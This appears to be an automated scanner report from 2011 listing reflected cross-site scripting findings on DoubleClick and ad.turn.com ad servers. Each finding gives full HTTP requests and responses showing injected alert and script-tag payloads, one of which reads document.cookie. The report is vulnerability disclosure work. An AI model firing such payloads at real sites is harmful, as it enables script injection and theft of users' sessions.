HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 37225 Cache-Control: no-cache Pragma: no-cache Date: Thu, 10 Mar 2011 16:45:41 GMT Expires: Thu, 10 Mar 2011 16:45:41 GMT
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd8f9"-alert(1)-"daf8fe6749e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7019 Cache-Control: no-cache Pragma: no-cache Date: Thu, 10 Mar 2011 16:45:40 GMT Expires: Thu, 10 Mar 2011 16:45:40 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749ehttp://ad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9509f"-alert(1)-"6749c3c0d7d was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 10 Mar 2011 16:44:23 GMT Vary: Accept-Encoding Expires: Thu, 10 Mar 2011 16:44:23 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7041
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = fals ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2c8"-alert(1)-"1f32606eed2 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-40638789337809121e2c8"-alert(1)-"1f32606eed2&adurl=;ord=1648973795? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 10 Mar 2011 16:45:26 GMT Vary: Accept-Encoding Expires: Thu, 10 Mar 2011 16:45:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 37216
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29875"-alert(1)-"c5c47c97bbe was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 10 Mar 2011 16:44:44 GMT Vary: Accept-Encoding Expires: Thu, 10 Mar 2011 16:44:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7041
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... RABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = false; va ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebe5e"-alert(1)-"7b2a3fedccd was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 10 Mar 2011 16:45:05 GMT Vary: Accept-Encoding Expires: Thu, 10 Mar 2011 16:45:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7037
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... sf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7470"-alert(1)-"05fd012cf34 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A// User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 10 Mar 2011 16:44:13 GMT Vary: Accept-Encoding Expires: Thu, 10 Mar 2011 16:44:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7037
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac6/f/194/%2a/e%3B235864053%3B1-0%3B0%3B59652986%3B3454-728/90%3B39730864/39748651/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4 ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de360"><script>alert(1)</script>924b327da15 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=de360"><script>alert(1)</script>924b327da15 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=gBDNuKNyKsl9Odgd8wAsQTKysbuTZf2s5M5FD_CAAB7DlGIUOWYS4TNj-1gj_Xcu6CYQDDQa1VL94yX_MoGpV_GUt1ksyvX1In61OuSwLt10u9X24kO-JCULGTAtCiI82oACfqCIYQ-ERdvzbQ_bSmzG5dlloET5SP593yLAYUYzCAmv0Bkl4LE-5xiOhqqU5hzUx6VAO2k6m2QQxK9K08oG9BkcazYcP_2TrcEOQP3WiKBAOiVD6755T8m0f3BSo_YLr4EKIQlY-CdWF8ITS28_IvRz2JEsIjhRKl0lPa2LXPx_rEG03BIJwC5BX6NRjN1OhEClvNCotpoUoTVc7xvpANZVmAjLpguK-shoxo4dbNA6MY7kRMgbXMy-D477nELWUQ0Rw535KLqcq4q__J8WOoC21eSuP4JNkyvRABQFijVgU7PXn0jHxkPCNv4bOyUPC9Fpm7etzgvO_fmrPkooj63m4sjCGxUC0pM2SLiq9bBec_QkIP-JoLdM2w1VhZ21JrK1wBbfUDbEfzxZmaJD4c5aSaK33YzyKwwYBCqCQPyKSyeLLFNGI5yEMkfIKVPRVzGG23OkJv5AMKUTaqg_u8mtM46FV1h3QfJdTZWUFE9U6EKcwdjYdcVNUkvIeogMyqtOxBjt39bKPXzgmmxBsnrLbTgBzBVNImszQJKvw9LgipyjPoHCcfZrpUai4JLuayTba8oiNq_XhSPmwx5GmgUQyfnbOd2w3kmx8qvNHk6KDzwAPsyOISbfg6MfRpzV7LM6J13WDlxXaw0dwtaogoecLkh5Gdwzns6PR3AwgCiTm-xPyon8eQDhlKvugIXAKcMPhEbqI-V9Sv3eooMsNg36di6E49Nomd6jTU9egCSRMS98UFVNYjVtQ4urBK3FjPWZ3Di0FOD2Kcxr-k0OB82HjViKXqLuoMNTyWQcXhNTrz3mr8sow7iQNpitGHAyXWEYyGBykEoLQhmrWNoPJC71oS0hJqlJnrpnGFhJzhvWSyFYd2BWpLKYJlg6-W5HTVi_oOco4RQh7z9_-JaW43Pz5VN0dvHJoxbNVZ97tpG9XttSdPWXi0z6Jg6IsnTvMmWWDNqbkX3hH8mhIYBK7MGRBOeR1YzcCeyMpDmJ0VuAHXPcV73Qns4O__Jj2lJ6ZKhH3VM3BvZ2PJZeyo_K_w_o-V6MIHko5ImHHJbecjI5VdlIWmt54cjQRcHYMQPwiCOVkrMyS-0aX55fmlk35l0spUAw8t8ZqIkxNj8MPYazz3rO03ATWFwaY5i7iStqAsWbZ7YUH8GSY7-t_J4r25-aiikPN2qEVv7TRiqUvlZaM8XFIBijkSFeg2zGD4fdRlNM5LTzq4xWE1ZK--LAz8MzOM-C6CDT3q-ifKpEezhVQTYte5F3-FeYiKlQRaZz7xWCD_yX14N-tT3hfO0kAXszpV0W1GkBMMS3Gw0HTCum57pWAGCiPcC_Z3qGFfLVq6mopJGWBFdzU_rmPxWIBEzIt_I5ABOElN7-o1N0L93nQNnHmE-8Xu8-ECY9xLe3lcSfWb-KhRGhyVysbsZk7iyEoz8zA3JQ2C9OfjxiW2aYr0a3K5tIEMzcXQPpur3bq3Thm6_2RS_S2g9W_7fY1zc1K0WPlL98x7sL6KENQXMr7tOj0tStdl9JeUiMHFtb__DUdwj-uP98hpbTt4roaMGQuQnD9agQHp-xH4Jafs6FBmb98eQD_cOP3DvEMi6XhBSdavl4LR2MIjmTF0mh_AG_jc7gjylPqQCeipADH7ZUYz5xSIAGz8ZVdz_gI_tGwcmLB8JEgvxf4yceK-ytsejiDtfYk-vq9YFwucMhc7pp4fbrfTAG1AhqWCVhGwlgeOqlB-BkyxJ1zDSGE0snnnxI1S7YTiuj-fGScF4oQVIZccBuiROOGCDUYKGlYL_kqGR8obvHHZk267UOKXgsCO18tJuj14RjnfWV9JCCZksmnBPhOpWQIIbDrQeMFzQrFDQzzgYAL9AjXWyagDxRnYrN-9pjuSYDN0EVr-A1pVfxWPrW29xmD_ZeGx-AE82rXSYVcjz2J0squiYwC1lSTDghv5hxN42WTZrbBPUWmCi_6M18neu_Vazros1bDD1RMNP69o628EHNgUTgy0PfHqtb-SYVZWNt6hO30_te5Eiua7R-LT6r8oudwmlo4u1rDUlsabP08_i0966mykYBmvFZvHLkAa30wkjTumfXaFDIfbonZq657eoULxrE0KDvfmac-lNvjOsoiUlf13KH2StPZs3JjeWcrw3FmAmZ_RtseJ6xozjuP7ZdQwIEpp8nLCbAQOxgA2x5FvD72qZzxdn2BHj2pHFYtOY7bzwWmWsNvLyU_XSNqO1BDG83X80DgytqEg90YRZxOOi-Q0rmjkPfMOEIgGA-K9y-Zc4tR7KRJlpJ4PlVYxVaMvB1wYPNMfFs382zN0o7uzcPmdNK1_b3Ua6Vc0GyYGzFgDpNxONxibEN5pV6-d_sBzVLRBMFYCWf6caSG4LvO5wFQK5rWe8X_fTtzfSXBh6egF0Rwa3OCNWzkU-61-zDsHD8uqSEGm_zHYk1Lx3D3zdxfoViaQ2DOWdSRXMqAXHjE1bj46PH61xKbR-SCeq4p4CAvfxI-56aT45lrDgMry2PNxuYVt3awaDu13VvFwpGzs06VQoe4DVxSHVvfrsSQMYWsxPY7alAyM08Y81chhsaFrvpqC9YhigzHku7t4ADij4Bw7EVtWzromyqquGZ7KVTTEQszed-lC1fMtCjU1z2xJ1CnZG4LQk8JxaWG0f85jA_1_EgfGzLymJqXqxDkl_z6MLzU6M9nX4-GUSLU2nvHNtoJlouXD8ZYi9DnZrOv6fUoZGFDgLSYVRUaQ-Wqmj3Tei_CdEkIQzkhmYyekerLrx9FrOtoxmBIEIaEp5KqP8jd88N4SLrpWX75qPcPWilpSsIABAYe0PnXbtU01VUbzTE76SN2br5p6VEXJlHEcVqa7s7pI24wvVlZWelsG_swcmrkZNllXiyt69BIY5KH70UEviYerZeVNNKkpbsXiR6Sun3kKaXxA7raRqYLrVBWPKJ4cYHaESEng8GxJ7c7_83qI2KkIKG8gPGwoFkVm7IMVTuQueBCC8E-DRc1jh5bznh7BOOaG3LFaFrDxbQguDVYtQ8E9kG41oci0hMyGPNDNYChhIU2SM-p93HtlelH6k8ZGZ9nInahZ1BmsDoTBButUd9vgmil7cXXXfT6KV3aaEupqcZ9U4B3wCLwXiaLjGOznKQN2fXE5YYm2elYiZf3N9hm3IU4-yhSvbDCYg23HEA0KbM-xv4ELaLtSRShf0UMkiZR4NHAE0AveeA8Od6uUEN_o-A1cEo1GBBE34wNgkMQOaX-ISsqxHKtScufiDGDFsr9zy3Wkv1Du64b3_CXR0nvouK2wr8mFPHCrur0quGluzBKZVWVHUrVyrSTcpi1qL8jLHo7PL51CfPsP5BkHuAnw4dd_nuCuXKeeOhPEegXpshkW-21H-LVw_kXbBwJ1IK5XZLAb-8EOvYR-BHV151XTPMJca60BfG9XaYHcjUsne2Ci3TfaGg1576UZ7-P2Tufjq7ydXKpAG1gOCnsXVPO2QWKa2hO56wnpU2kdj1scl_syvmA6j_Le8O; fc=bFQxMilhpzlWLYP_sXBtIYFmw5EWfjbh1eOA1sz7ZRCXg1SDiQ1wNQPvEsHDR6r4QRgl2iHtGb0XSne6Zh5vRr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; 